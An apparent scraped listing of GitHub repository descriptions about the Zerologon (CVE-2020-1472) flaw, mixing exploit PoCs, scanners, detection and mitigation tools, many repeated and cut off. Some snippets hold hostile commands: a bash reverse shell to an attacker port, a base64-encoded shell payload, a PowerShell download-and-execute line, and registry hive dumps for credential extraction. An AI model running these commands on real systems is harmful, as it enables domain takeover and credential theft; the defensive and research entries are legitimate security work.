CVE-2020-1472

ZeroLogon testing script A Python script that uses the Impacket library to test vulnerability for the Zerologon exploit (CVE-2020-1472) It attempts to perform the Netlogon authentication bypass The script will immediately terminate when successfully performing the bypass, and not perform any Netlogon operations When a domain controller is patched, the detection script will g

zerologon Canal de youtube youtubecom/c/Anonimo501 Grupo en Telegram tme/Pen7esting zerologon El script de zerologon nos automatiza por completo el ataque logrando ahorrar tiempo en las auditorias de pentestg, se debe tener encuenta que para el uso del script se debe tener un permiso de la empresa que se esta auditando y dos un backup de DC/AD ya que el ataqu

ZeroLogon Exploitation Lab

ZeroLogon (CVE-2020-1472) Exploitation Lab Description The purpose of this project is to demonstrate the ZeroLogon, also known as CVE-2020-1472 vulnerability in a controlled lab environemnt This vulnerability poses a significant threat to Microsoft Windows domain controllers, potentially leading to unauthorized access and compromise of an entire network Environments Used W

searchcve Web scrapping tool written in python3, using regex, to get CVEs, Source and URLs Generates a CSV file in the current directory Dependencies requests must be installed pip install requests should do this job :) Example of usage python3 searchcvepy us-certcisagov/ncas/alerts/aa21-209a python3 searchcvepy wwwkennasecuritycom/blog/top-vulner

Python nmap scripts

Python nmap Scripts are example of use of python nmap and possibility to integrate it with other python module like Metasploit or ServiceNow Alone it can provide clear report, without needed to parser or formatting it after scan finished Script also improve speed and reliability by scan phases and some other additional functions List of scripts: cisco_SIE_Scanpy - Discover

An automatic program to be used by the SOC Manager. The script will allow the Administrator to choose different types of attacks to test a system.

soc_checkersh Centre for Cybersecurity Project Mission: One of the biggest challenges in managing SOC teams is keeping the teams alerted An incident that is not properly managed can bring an organization great damage Creating an automatic attack system will allow the SOC manager to check the team's vigilance Objective: An automatic program to be used by the SOC Manager

zerologon-restore Canal de youtube youtubecom/c/Anonimo501 Grupo en Telegram tme/Pen7esting zerologon-restore Es un script que repara la contraseña de la cuenta del equipo para funcione correctamente el active directory, luego de haber resivido el ataque zerologon, es muy importante saber que es necesario ejecutar este script luego de haber explotado l

Nightly builds of common C# offensive tools, fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.

SharpCollection Nightly builds of common C# offensive tools, fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines Is your favorite tool missing? Feel free to open an issue or DM me on twitter @Flangvik Please note that Cobalt Strike's execute-assembly only accepts binaries compiled with the "Any CPU"

ZeroLogon testing script A Python script that uses the Impacket library to test vulnerability for the Zerologon exploit (CVE-2020-1472) It attempts to perform the Netlogon authentication bypass The script will immediately terminate when successfully performing the bypass, and not perform any Netlogon operations When a domain controller is patched, the detection script will g

Command line tool to get CVE useful info from any web report using the NVD database (NIST). Time saver for analysts.

searchcve Web scrapping tool written in python3, using regex, to get CVEs, Source and URLs Generates a CSV file in the current directory Uses the NIST API v2 to get info Install dependencies requests, bs4 (or beautifulsoup4) and prettytable must be installed You might want to create a venv before installing the dependencies pip install -r requirementstxt

Command line interface for Kenna API

A CLI for Kenna Platform Command line interface for Kenna Platform that help security engineers to get results quickly The Kenna Modules Implemented with The API Vulnerabilities Assets Asset Tagging Asset Groups Asset group reporting Connectors Connector Runs Users Roles Fixes Applications Application Reporting Dashboard Groups Data export CVEs Kenna VI+ Infe

Zero-day-scanning is a Domain Controller vulnerability scanner, that currently includes checks for Zero-day-scanning (CVE-2020-1472), MS-PAR/MS-RPRN and SMBv2 Signing.

zeroscan Zeroscan is a Domain Controller vulnerability scanner, that currently includes checks for Zerologon (CVE-2020-1472), MS-PAR/MS-RPRN and SMBv2 Signing CVE-2020-1472: Uses a built-in script to check for Zerologon (CVE-2020-1472), but does NOT attempt to exploit the target, it is simply a vulnerability scanner Codebase borrowed from: githubcom/Anonymous-Family

Command line interface for Kenna API

A CLI for Kenna Platform Command line interface for Kenna Platform that help security engineers to get results quickly The Kenna Modules Implemented with The API Vulnerabilities Assets Asset Tagging Asset Groups Asset group reporting Connectors Connector Runs Users Roles Fixes Applications Application Reporting Dashboard Groups Data export CVEs Kenna VI+ Infe

PoC for Zerologon (CVE-2020-1472) - Exploit

CVE-2020-1472 - Zero-Logon POC This exploit requires you to use the latest impacket from GitHub Ensure impacket installation is done with netlogon structures added Note : By default, successful exploitation changes the password of the DC Account Allows DCSync Breaks communication with other domain controllers (Be careful!) Original Research & information her

Common Vulnerability Scoring System (CVSS)

go-cvss - Common Vulnerability Scoring System (CVSS) Importing CVSS vector and scoring Supports CVSS v2, v30 and v31 Exporting CVSS information with template string Migrated repository to githubcom/goark/go-cvss Sample Code Base Metrics package main import ( "fmt" "os" "githubcom/goark/go-cvss/v3/metric" ) func main() {

Zerologon Vulnerability Checker

Zerologon_Vulnerability_Checker Zerologon Vulnerability Checker Zerologon Vulnerability Checker The Zerologon Vulnerability Checker is a Python script that checks if a Windows domain controller is vulnerable to the Zerologon vulnerability (CVE-2020-1472) The vulnerability allows an attacker to bypass the authentication process and gain administrative access to the domain contr

红队常用命令速查

command 收集渗透中会用到的常用命令 。 建议直接[Ctrl+F]查找 java命令执行 如下编码网站： ares-xcom/tools/runtime-exec/ r0yanxcom/tools/java_exec_encode/ wwwbugkunet/runtime-exec-payloads/ 手动编码操作 bash -c {echo,cGluZyAxMjcuMC4wLjE7ZWNobyAxID50ZXN0LnR4dA==}|{base64,-d}|{bash,-i}

Pentesting Tools quick installer

Usage EasiWeaponssh heavily relies on Python virtual environments and uses pipx, poetry and pipenv to orchestra venvs In order to launch the bleeding-edge version of a tool installed with pipx and not the version that is already shipped with Kali, you should modify the PATH variable: Modify PATH for a normal user with any method you want (bashrc / profile / zshrc / etc):

PoC for Zerologon - all research credits go to Tom Tervoort of Secura

CVE-2020-1472 POC Requires the latest impacket from GitHub with added netlogon structures Do note that by default this changes the password of the domain controller account Yes this allows you to DCSync, but it also breaks communication with other domain controllers, so be careful with this! More info and original research here Installing Only works on Python 36 and newer! I

Pentest-Tools-Collection Active Directory AMSI amsifail/ Tool Collections WinPwn githubcom/S3cur3Th1sSh1t/WinPwn Import-Module \WinPwnps1 iex(new-object netwebclient)downloadstring('rawgithubusercontentcom/S3cur3Th1sSh1t/WinPwn/master/WinPwnps1') Ghostpack githubcom/GhostPack Seatbelt, KeeThief, Rubeus, SharpUp Powersploit

https://github.com/dirkjanm/CVE-2020-1472

CVE-2020-1472 POC Requires the latest impacket from GitHub with added netlogon structures Do note that by default this changes the password of the domain controller account Yes this allows you to DCSync, but it also breaks communication with other domain controllers, so be careful with this! More info and original research here Exploit steps Read the blog/whitepaper above so

CVE-2020-1472 POC Requires the latest impacket from GitHub with added netlogon structures Do note that by default this changes the password of the domain controller account Yes this allows you to DCSync, but it also breaks communication with other domain controllers, so be careful with this! More info and original research here Installing Only works on Python 36 and newer! I

CVE-2020-1472 POC Requires the latest impacket from GitHub with added netlogon structures Do note that by default this changes the password of the domain controller account Yes this allows you to DCSync, but it also breaks communication with other domain controllers, so be careful with this! More info and original research here Exploit steps Read the blog/whitepaper above so

CVE-2020-1472 Event Reader v11 8/27/2020 This script will: 1 Scan system evtx in input file folder for event 5827, 5828,5829,5830 and 5831, exact data fields, export to 582#-*CSV 2 Calls Excel to import resulting 582#-CSV, create pivot tables for common secure RPC analysis scenarios Delete 582#-CSV afterward Feel free to modify to fit your need Script tries best effo

Collection of extra pentest tools for Kali Linux

☢️☣️ NOT PROPERLY MAINTAINED ANYMORE It has become such a pain to properly maintain this repository (every new Kali release very likely breaks some dependencies for at least one of the million listed tools), so a smooth installation process is not guaranteed Now I treat WeaponizeKalish not as an automation script, but as a collection of useful tools (resources) to be

An Active Directory pwn collection written in shell script

ADBasher Under Development An Active Directory penetration testing framework written in shell script This repo is a shell-script implementation of the "Active Directory pentesting mind map" found here: githubcom/esidate/pentesting-active-directory and seen here: Version 040 Many scripts added Userfriendliness improved with GPT Version 011 &qu

Exploit for zerologon cve-2020-1472

ZeroLogon exploitation script Exploit code based on wwwsecuracom/blog/zero-logon and githubcom/SecuraBV/CVE-2020-1472 Original research and scanner by Secura, modifications by RiskSense Inc To exploit, clear out any previous Impacket installs you have and install Impacket from githubcom/SecureAuthCorp/impacket/commit/b867b21 or newer Then, do: pyt

Scripts for NP CSF Ethical Hacking Module Assignment

EH-Assignment Scripts for NP CSF Ethical Hacking Module Assignment Assignment demonstrates SambaCry (CVE-2017-7494) and ZeroLogon (CVE-2020-1472) Designed to replicate an enterprise pentest/attack scenario The Simulated Attack includes the following components Scanning and Enumeration Exploitation Pivoting Post-Exploitation Activities Disclaimer: The author is NOT respons

关于工作组和域信息收集的工具

简介 用c#编写的一款关于工作组和域信息收集的工具，收集包括net版本、IP信息、网络连接状态、历史RDP的内外连、回收站信息、杀软等，域内信息收集域控的FQDN以及IP、域管理员组、域企业管理员组等信息，并自动化探测域控是否有ZeroLogon漏洞。 用法： 直接运行 \SharpGetinfoexe

hAcKtive Directory Forensics Compiled by 1nTh35h311 (#yossi_sassi) Page last updated on September 18th 2023 (tools in links may update routinely) Comments and improvements are welcome Talks, slides & videos: 'HackCon' 2023 talk: Hacktive Directory Forensics - a toolkit for understanding who|what|when in your domain Slides - Presentation slides 'Hack In

域控打法笔记 CVE-2020-1472 zerologon 检测脚本 githubcom/SecuraBV/CVE-2020-1472 利用 githubcom/risksense/zerologon 置空密码 利用空密码dumphash 执行如下命令，将注册表下载到本地 reg save HKLM\SYSTEM systemsave reg save HKLM\SAM samsave reg save HKLM\SECURITY securitysave get systemsave get samsave get securitysav

A Python3.6+ script that generate a note template and basic checklists for use during CTF and OSCP. Can parse Nmap XML outputs automatically.

CTF-Note-Template-Generator A Python36+ script that generate a note template and basic checklists in markdown for use during CTF and OSCP Can parse Nmap XML outputs automatically Feel free to fork it! Issue reports and suggestions welcome! If you are interested in how I use this note template, you can check out my repo of the manual template Latest Version 112 Fixed an is

CVE-2020-1472 POC Requires the latest impacket from GitHub with added netlogon structures Do note that by default this changes the password of the domain controller account Yes this allows you to DCSync, but it also breaks communication with other domain controllers, so be careful with this! More info and original research here Exploit steps Read the blog/whitepaper above so

ZeroLogon testing script A Python script that uses the Impacket library to test vulnerability for the Zerologon exploit (CVE-2020-1472) It attempts to perform the Netlogon authentication bypass The script will immediately terminate when successfully performing the bypass, and not perform any Netlogon operations When a domain controller is patched, the detection script will g

CVE-2020-1472 POC Requires the latest impacket from GitHub with added netlogon structures Do note that by default this changes the password of the domain controller account Yes this allows you to DCSync, but it also breaks communication with other domain controllers, so be careful with this! More info and original research here Exploit steps Read the blog/whitepaper above so

CVE-2020-1472 POC Requires the latest impacket from GitHub with added netlogon structures Do note that by default this changes the password of the domain controller account Yes this allows you to DCSync, but it also breaks communication with other domain controllers, so be careful with this! More info and original research here Exploit steps Read the blog/whitepaper above so

CVE-2020-1472 Checker & Exploit Code for CVE-2020-1472 aka Zerologon Tests whether a domain controller is vulnerable to the Zerologon attack, if vulnerable, it will resets the Domain Controller's account password to an empty string NOTE: It will likely break things in production environments (eg DNS functionality, communication with replication Domain Controller

Assorted things I wrote for CTF's or just... yolo.

Tools Assorted tools I wrote for CTF's, pen-testing or as a pastime of sorts asciidcpy I used this to decode an ASCII-output I got from picoCTF's mercurypicoctfnet netcat Reads a file with numbers in it, one number per line ending in \n and interprets those as ASCII-Codes Writes the characters to STDOUT for easy copypasta Usage: python3 asciidcpy <filen

SharpCollection Nightly builds of common C# offensive tools, fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines Is your favorite tool missing? Feel free to open an issue or DM me on twitter @Flangvik Please note that Cobalt Strike's execute-assembly only accepts binaries compiled with the "Any CPU"

Reworked version of NCC Group's [SharpZeroLogon](https://github.com/nccgroup/nccfsas/tree/main/Tools/SharpZeroLogon) for .NET Framework 3.5

SharpZeroLogon This is an exploit for CVE-2020-1472, aka Zerologon This tool exploits a cryptographic vulnerability in Netlogon to achieve authentication bypass Ultimately, this allows for an attacker to reset the machine account of a target Domain Controller, leading to Domain Admin compromise The vulnerability was discovered by Tom Tervoort of Secura BV, and was address

Post-compromise AD password reset

Post-compromise AD password reset Notes copied from us-certcisagov/ncas/alerts/aa20-283a If there is an observation of CVE-2020-1472 Netlogon activity or other indications of valid credential abuse detected, it should be assumed the APT actors have compromised AD administrative accounts, the AD forest should not be fully trusted, and, therefore, a new forest should be

Tool for mass testing ZeroLogon vulnerability CVE-2020-1472

Tool for mass testing ZeroLogon vulnerability CVE-2020-1472 Steps to procedure For using this tool you need a hosts file with the ip adress and hostname separated by comma Hosts file sample 1111 , WIN-6641554161U 1111 , SERVERDATA 1111 , SERVER2012 1111 , DC01 1111 , SERVER

Zeroscan is a Domain Controller vulnerability scanner, that currently includes checks for Zerologon (CVE-2020-1472), MS-PAR/MS-RPRN and SMBv2 Signing.

zeroscan Zeroscan is a Domain Controller vulnerability scanner, that currently includes checks for Zerologon (CVE-2020-1472), MS-PAR/MS-RPRN and SMBv2 Signing CVE-2020-1472: Uses a built-in script to check for Zerologon (CVE-2020-1472), but does NOT attempt to exploit the target, it is simply a vulnerability scanner Codebase borrowed from: githubcom/SecuraBV/CVE-202

CVE-2020-1472 Checker & Exploit Code for CVE-2020-1472 aka Zerologon Tests whether a domain controller is vulnerable to the Zerologon attack, if vulnerable, it will resets the Domain Controller's account password to an empty string NOTE: It will likely break things in production environments (eg DNS functionality, communication with replication Domain Controller

Static standalone binaries for Linux and Windows (x64) of Python offensive tools. Compiled using PyInstaller, Docker for Windows, WSL2, and Make.

OffensivePythonPipeline This repository contains the following static standalone binaries of Python offensive tools: Tool Operating System(s) Binary output(s) Certipy Linux / Windows x64 certipy_linux certipy_windowsexe CrackMapExec Linux / Windows x64 crackmapexec_linux crackmapexec_windowsexe dirkjanm's CVE-2020-1472 (ZeroLogon) Linux / Windows x64 cve-202

cve-2020-1472 @toc 漏洞原理 原理比较复杂，有兴趣的可以看看下面链接上的文章wwwfreebufcom/articles/system/249860html 利用 1修改文件impacketdcerpcv5nrpc 需要利用githubcom/SecureAuthCorp/impacket/edit/master/impacket/dcerpc/v5/nrpcpy文件替换本机上的nrpc文件。本机nrpc文件存储路径为：C:\Users\Administr

A simple implementation/code smash of a bunch of other repos

CVE-2020-1472-Easy This is definitely not something you would want to run on anything that you care about Built from a writeup and work from @obfuscatee and another source Uses code from githubcom/dirkjanm/CVE-2020-1472 githubcom/SecuraBV/CVE-2020-1472 githubcom/VoidSec/CVE-2020-1472 githubcom/SecureAuthCorp/impacket Basically does a zerolog

A curated list of my GitHub stars!

Awesome Stars A curated list of my GitHub stars! Generated by starred Contents Adblock Filter List Assembly Astro Batchfile BitBake Blade C C# C++ CMake CSS Clojure CoffeeScript Common Lisp Dart Dockerfile Elixir Elm Emacs Lisp F# Fennel FreeMarker Go Groff Groovy HCL HTML Hack Haskell Haxe Inno Setup Java JavaScript Jinja Julia Jupyter Notebook KakouneScript Kotlin Less L

个人整理的一些域渗透Tricks，可能有一些错误。

Hunting-Active-Directory 个人整理的一些域渗透Tricks，可能有一些错误。 信息收集 常用命令 Net use Net view Tasklist /v Ipconfig /all net group /domain 获得所有域用户组列表 net group "domain admins" /domain 获得域管理员列表 net group "enterprise admins" /domain 获得企业管理员列表 net localgroup administra

ZeroLogon testing script A Python script that uses the Impacket library to test vulnerability for the Zerologon exploit (CVE-2020-1472) It attempts to perform the Netlogon authentication bypass The script will immediately terminate when successfully performing the bypass, and not perform any Netlogon operations When a domain controller is patched, the detection script will g

Zerologon Summary A Zeek detection package for CVE-2020-1472, also known as Zerologon, which is a CVSS 100 privilege escalation vulnerability against the Netlogon protocol for Windows Server domain controllers Notices By default, both notices are raised: Zerologon_Attempt indicates the requisite number of login attempts were made within a short period of time Zerologon_Pass

Dangerous Vulnerabilities Scanner

DVS Dangerous Vulnerabilities Scanner - scanner for finding dangerous and common vulnerabilities (more applicable on intranet) The scanner checks: SMB (MS17-010) RDP (Bluekeep, NLA) Cisco Smart Install IPMI (hash discloser) DC (Zerologon) LDAP (NULL Base) SNMP ('public' community name) Script from the githubcom/Kecatoca/Zerologon_test is used to check the

Pentester checklist

ЧЕКЛИСТ ПЕНТЕСТЕРА 1 Разведка КАКУЮ ИНФОРМАЦИЮ ИСКАТЬ: Обнаружение доменных имен, принадлежащих организации Обнаружение “живых” хостов в сети и составления списка их IP-адресов Определение актуальног

A cheatsheet of tools and commands that I use to pentest Active Directory.

Pentesting Active Directory This is a cheatsheet of tools and commands that I use to pentest Active Directory It includes Windows, Impacket and PowerView commands, how to use Bloodhound and popular exploits such as Zerologon and NO-PAC Enumeration Initial system enumeration See local accounts net user See all of the accounts in the domain net user /domain Check if an acc

CVE-2020-1472 - Zero Logon vulnerability Python implementation

CVE-2020-1472 CVE-2020-1472 - Zero Logon vulnerability Python implementation Description A Python script which uses the Impacket library to test for CVE-2020-1472 - Zerologon vulnerability (credits to Secura research) The flaw stems from the Netlogon Remote Protocol, available on Windows domain controllers, which is used for various tasks related to user and machine authentic

Up_windows Run AS without terminal githubcom/antonioCoco/RunasCs SeLoadDriverPrivelege POC -->compile githubcom/TarlogicSecurity/EoPLoadDriver/ Driver githubcom/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcomsys driver exploit --> compile githubcom/tandasat/ExploitCapcom --> add reverseshell!!!!!! -->&

Zeek package to detect Zerologon

Zerologon Summary A Zeek detection package for CVE-2020-1472, also known as Zerologon, which is a CVSS 100 privilege escalation vulnerability against the Netlogon protocol for Windows Server domain controllers Notices By default, both notices are raised: Zerologon_Attempt indicates the requisite number of login attempts were made within a short period of time Zerologon_Pass

CVE-2020-1472 C++

ZeroLogon CVE-2020-1472 C++版本，此工具会直接重置机器账户的密码，无具备恢复功能，实战场景中慎用。 参考BOF版本：ZeroLogon-BOF更改后的单文件EXE版本，编译完后仅200KB左右，适合在极端环境下进行漏洞利用。

Collection of C# projects. Useful for pentesting and redteaming.

RedCsharp Offensive C# tools CasperStager PoC for persisting NET payloads in Windows Notification Facility (WNF) state names using low-level Windows Kernel API calls CSExec An implementation of PSExec in C# CSharpCreateThreadExample C# code to run PIC using CreateThread CSharpScripts Collection of C# scripts CSharpSetThreadContext C# Shellcode Runner to execute

Pentest-Tools-Collection Active Directory AMSI amsifail/ Tool Collections WinPwn githubcom/S3cur3Th1sSh1t/WinPwn Import-Module \WinPwnps1 iex(new-object netwebclient)downloadstring('rawgithubusercontentcom/S3cur3Th1sSh1t/WinPwn/master/WinPwnps1') Ghostpack githubcom/GhostPack Seatbelt, KeeThief, Rubeus, SharpUp Powersploit

Awesome Stars A curated list of my GitHub stars! Generated by starred Contents Batchfile C C# C++ CSS Dockerfile Go HTML Haskell Java JavaScript Jupyter Notebook Kotlin Lua Objective-C Others PHP Perl PowerShell Python Ruby Rust Shell Swift TypeScript Batchfile GossiTheDog/SystemNightmare - Gives you instant SYSTEM command prompt on all supported and legacy versions of W

cve-2020-1472_Tool collection

Introduction article wwwyuquecom/shamo-vs4ia/vul/ktduf8 Environmental preparation pip3 install -r requirementstxt Vulnerability detection python3 zerologon_testerpy ad ad_ip Exploit python CVE-2020-1472py AD AD$ adip secretsdumppy -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'godorg/owa2010cn-god$@192168321' Successfully exported all hashes Query ha

Ladon Moudle CVE-2020-1472 Exploit 域控提权神器

Ladon Moudle CVE-2020-1472 Exploit Usage: k8gegeorg/Ladon/cve-2020-1472html

[CVE-2020-1472] Netlogon Remote Protocol Call (MS-NRPC) Privilege Escalation (Zerologon)

[CVE-2020-1472] Netlogon Remote Protocol Call (MS-NRPC) Privilege Escalation (Zerologon) The attack described here takes advantage of flaws in a cryptographic authentication protocol (insecure use of AES-CFB8) that proves the authenticity and identity of a domain-joined computer to the Domain Controller (DC) Due to incorrect use of an AES mode of operation it is possible to sp

Modified the test PoC from Secura, CVE-2020-1472, to change the machine password to null

ZeroLogon - Exploit and Example Modified the test PoC from Secura, CVE-2020-1472, in order to change the machine's password to null Changing the password on the machine uses Microsoft's NetrServerPasswordSet2() function This exploit takes advantage of Impacket's nrpcpy module to call NetrServerPasswordSet2() Run the exploit /zerologon_NULLPASSpy <dc

Zabbix Template to monitor for Windows Event Viewer event's related to Netlogon Elevation of Privilege Vulnerability - CVE-2020-1472. Monitors event ID's 5827, 5828 & 5829. See: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472

zabbix-template-CVE-2020-1472 Zabbix Template to monitor for Windows Event Viewer event's related to Netlogon Elevation of Privilege Vulnerability - CVE-2020-1472 Monitors event ID's 5827, 5828 & 5829 portalmsrcmicrosoftcom/en-US/security-guidance/advisory/CVE-2020-1472

Daily builds of common C# offensive tools, built via Github actions

SharpCollection UNDER Construction This repo is based off of githubcom/Flangvik/SharpCollection, it similiarly completes nightly builds of common C# offensive tools, fresh from their respective master branches built and released in a CDI fashion as a daily cron Github Action Github Actions To download the tools you want select the Actions Tab, select the tool build, s

Lumberjack: An Active Directory vulnerability identification, exploitation, & reporting tool

Lumberjack A python project for my honours dissertation Description This is a prototype tool that uses python to identify and exploit vulnerabilities in an Active Directory, then generate reports on the vulnerabilities This script makes use of Impacket by SecuraAuthPort and the Zerologon exploit developed by Secura Getting Started Dependencies Python 36 or higher See requir

Zerologon Check and Exploit - Discovered by Tom Tervoort of Secura and expanded on @dirkjanm's cve-2020-1472 coded example. This tool will check, exploit and restore password to original state

CVE-2020-1472 aka Zerologon Exploit POC What is it? NetLogon (MS-NRPC), can establish inter-domain cont

Test script for CVE-2020-1472 for both RPC/TCP and RPC/SMB

Zerologon test for SMB & RPC A python script based on SecuraBV script Demonstrates that CVE-2020-1472 can be done via RPC/SMB, and not only over RPC/TCP Additionaly, there is a random byte in the final client challange & client credential - to test against trivial IDS signatures The RPC/SMB scan runs by default Depending on the target server, some may requir

Awesome Systools is a collection of sysadmins daily handy tools.

Awesome Systools Lists The Book of Secret Knowledge Awesome-Selfhosted: This is a list of Free Software network services and web applications which can be hosted locally Selfhosting is the process of locally hosting and managing applications instead of renting from SaaS providers Lucid Index: This site's goal is to help you find the software you need as quickly as possi

zerologon script to exploit CVE-2020-1472 CVSS 10/10

zerologon zerologon script to exploit CVE-2020-1472 CVSS 10/10 Exploit code based on wwwsecuracom/blog/zero-logon and githubcom/SecuraBV/CVE-2020-1472 Original research and scanner by Secura, modifications by RiskSense Inc githubcom/risksense/zerologon To exploit, clear out any previous Impacket installs you have and install Impacket from g

内网渗透相关总结

Hack_For_Intranet 0x01 信息收集 1常见信息收集命令 #ipconfig: ipconfig /all ------> 查询本机 IP 段，所在域等 #net: net user ------> 本机用户列表 net localgroup administrators ------> 本机管理员[通常含有域用户] net user /domain ------> 查询域用户 net group /domain --

Table of Contents Read and summarize SQLZoo WebGoat SQLZoo Bonus WebGoat Bonus CRUD operations Bonus Aggregate functions Bonus JOIN Bonus Read and summarize OWASP Top 10 2021 A05:2021-Security Misconfiguration There are many ways to misconfigure a system The most common ones are: Missing security configurations or permissions Unnecessary services, ports, protocols, or appli

一键域控。。先放一个poc好了

One_key_control_domain 一键域控。。先放一个poc好了 proxychains python3 clipy -r pocs/windowsexp/windows_dc_cve_2020_1472py -u 19216811 --dcname dcname

Cheatsheet from the PJPT course of TCM security.

PJPT-Notes Cheatsheet from the PJPT course of TCM security Enumeration sudo arp-scan -l netdiscover -r 19216850/24 nmap -T4 -p- -A 19216850/24 nmap -T4 -p- -A 19216851 nmap -T4 -p- -sS -sC 19216850/24 Initial attacks for Active Directory LLMNR Poiso

Protect your domain controllers against Zerologon (CVE-2020-1472).

Set-ZerologonMitigation Protect your domain controllers against Zerologon (CVE-2020-1472) Usage After installing the August 2020 security update (or a later cumulative version), just run the script on each of your domain controllers \Set-ZerologonMitigationps1 For help, run Get-Help: Get-Help \Set-ZerologonMitigationps1

OSCP / CTF

OSCP / CTF BASH SH REVERSE SHELL bash -i >& /dev/tcp/10101513/8091 0>&1 TRy to insert VAR into webapp myip:8081/$(id) └─$ nc -lvnp 8081 130 ⨯ listening on [any] 8081 connect to [10101577] from (UNKNOWN) [10

A checklist to follow when assessing a client's internal infrastructure for security & compliance testing. It is advised to focus more on the Active Directory section to get maximum information out of it for further attacks and enumeration.

External Recon & Testing One should gather the probable email addressess of the employees working at XYZ company using the methods given below It is possible to craft the email address by finding out the domain name and the email format of the company Reconnaissance using the tools given below phonebookcz theHarvester hunterio (Paid) linkedincom (gistgit

CFB8 Zero IV Attack ❯ python cfb8_zero_iv_attackpy [!] Attack Success Number of trials: 275 Key: b'U\x1e\x9eoKd\x18\xdf\x0c\x05\xfc3\x1f4\xd9\x8e' IV: b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' Plaintext: b'\x00\x00\x00\x00\x00\x00\x00\x00' Ciphertext: b'\x00\x00\x00\x00\x00\x00\x00\x00'

AM0N-Eye is the decompiled from Cobaltsetrike and has been modified and developed through several aggressor scripts & BOF is project based on a combination of different ideas and projects used by the threat actor where we observe a set of techniques to evasion EDR and AV while allowing the operator to continue using the tools

AM0N-Eye AM0N-Eye is the decompiled from Cobaltsetrike and has been modified and developed through several aggressor scripts & BOF is project based on a combination of different ideas and projects used by the threat actor where we observe a set of techniques to evasion EDR and AV while allowing the operator to continue using the tools The most focused point for the dev

Study Notes for the OSCP Content You will find notes from various resources like OSCP from Nakerah Network, Practical Ethical Hacking(PEH) course from TCM security, and more

Hunter OSCP Study-Notes Recon passive recon to find emails: hunterio/ phonebookcz/ clearbitcom/ to verify emails : toolsemailhippocom/ search for breached credentials in dehashed, google , have I been pawned Web App Information Gathering to find subdomains using sublis3r tool: sublist3r -d <domaincom> -t 100

Microsoft Defender XDR - Resource Hub

Microsoft Defender XDR - Resource Hub Welcome to the Microsoft Defender XDR Resource Hub Become a Microsoft Defender for Endpoint Ninja Become a Microsoft Defender for Office 365 Ninja! Become a Microsoft Defender for Cloud Apps Ninja! Become a Microsoft Defender for Identity Ninja Become an Azure Sentinel Ninja Become a Microsoft Defender Threat Intelligence

Zerologon (CVE-2020-1472) This script is made for bulk checking your domain controllers for the Zerologon vulnerability Note Zerologon vulnerabilities are dangerous for your domain controller, dont use the exploit on production servers Arguments --ip            &nbs

Hi, I'm Memduh! 👨‍💻 Cybersecurity Projects: Active Directory Home Lab 📄 Certifications Offensive Security Certified Professional (OSCP) CompTIA Security+ ce Certification CompTIA Network+ ce Certification Hacking Platforms Projects TryHackme HackTheBox 📺 YouTube Videos Zerologon Exploit (CVE-2020-1472) Eternal Blue (MS 17-010) ChatGPT

Zerologon自动化脚本

Auto ZeroLogon script 简介与使用 Zerologon自动化脚本，使用方式如下： 1扫描 python AutoZerologonpy dc_ip -scan 2漏洞利用 python AutoZerologonpy dc_ip -exp python AutoZerologonpy dc_ip -exp -user domain_admins 利用完成后自动恢复域控机器hash，默认使用Administrator，可-user指定域管，假�

Test tool for CVE-2020-1472

ZeroLogon testing script A Python script that uses the Impacket library to test vulnerability for the Zerologon exploit (CVE-2020-1472) It attempts to perform the Netlogon authentication bypass The script will immediately terminate when successfully performing the bypass, and not perform any Netlogon operations When a domain controller is patched, the detection script will g

Lab introduction to ZeroLogon

ZeroLogon testing script A lab setup to test a vulnerability for the ZeroLogon exploit (CVE-2020-1472) It contains a Python script that uses the Impacket library to test the vulnerability, and a Virtual Machine (VM) with Windows Server 2019 configured as a Domain Controller (DC) The script attempts to perform the Netlogon authentication bypass It will immediately terminate w

ZeroLogon testing script A Python script that uses the Impacket library to test vulnerability for the Zerologon exploit (CVE-2020-1472) It attempts to perform the Netlogon authentication bypass The script will immediately terminate when successfully performing the bypass, and not perform any Netlogon operations When a domain controller is patched, the detection script will g

Attempt at Obfuscated version of SharpCollection

Obfuscated SharpCollection Quick and dirty stab at automated Obfuscation using yetAnotherObfuscator by @0xcc00 together with fresh builds of common C# offensive tools, in a CDI fashion using Azure DevOps release pipelines Obfuscated SharpCollection is not intended to be as complete as the original SharpCollection repo Obfuscated SharpCollection only contains obfuscated NetFra

Exploit Code for CVE-2020-1472 aka Zerologon

CVE-2020-1472 Checker & Exploit Code for CVE-2020-1472 aka Zerologon Tests whether a domain controller is vulnerable to the Zerologon attack, if vulnerable, it will resets the Domain Controller's account password to an empty string NOTE: It will likely break things in production environments (eg DNS functionality, communication with replication Domain Controller

Scan for and exploit the zerologon vulnerability.

Zerologon Exploit Script This script is used to test and exploit unpatched Domain Controllers for the Zerologon Vulnerability (CVE-2020-1472) More information on this vulnerability can by found here: wwwsecuracom/blog/zero-logon The PoC code for detection was provided by SecuraBV and can be found here: githubcom/SecuraBV/CVE-2020-1472 The exploit code has be

ZeroLogon testing script A Python script that uses the Impacket library to test vulnerability for the Zerologon exploit (CVE-2020-1472) It attempts to perform the Netlogon authentication bypass The script will immediately terminate when succesfully performing the bypass, and not perform any Netlogon operations When a domain controller is patched, the detection script will gi

CVE-2020-1472 POC Requires the latest impacket from GitHub with added netlogon structures Do note that by default this changes the password of the domain controller account Yes this allows you to DCSync, but it also breaks communication with other domain controllers, so be careful with this! Link to the original research wwwsecuracom/blog/zero-logon) Installing Only

CVE-2020-1472 POC Requires the latest impacket from GitHub with added netlogon structures Do note that by default this changes the password of the domain controller account Yes this allows you to DCSync, but it also breaks communication with other domain controllers, so be careful with this! More info and original research here Installing Only works on Python 36 and newer! I

ad vulnerability scanner

AD高危漏洞扫描/利用工具   AD高危漏洞扫描/利用工具, 对AD高危漏洞进行快速批量检测。 模式 单机检测   未指定批量检测相关参数时, 默认使用该模式。 批量检测   当指定相关参数时(-all-dc/-tf), 启用批量检测模式, 在该模式下, 未指定目标ip文件时, 将通过dns解析域名

JustGetDA, a cheat sheet which will aid you through internal network & red team engagements.

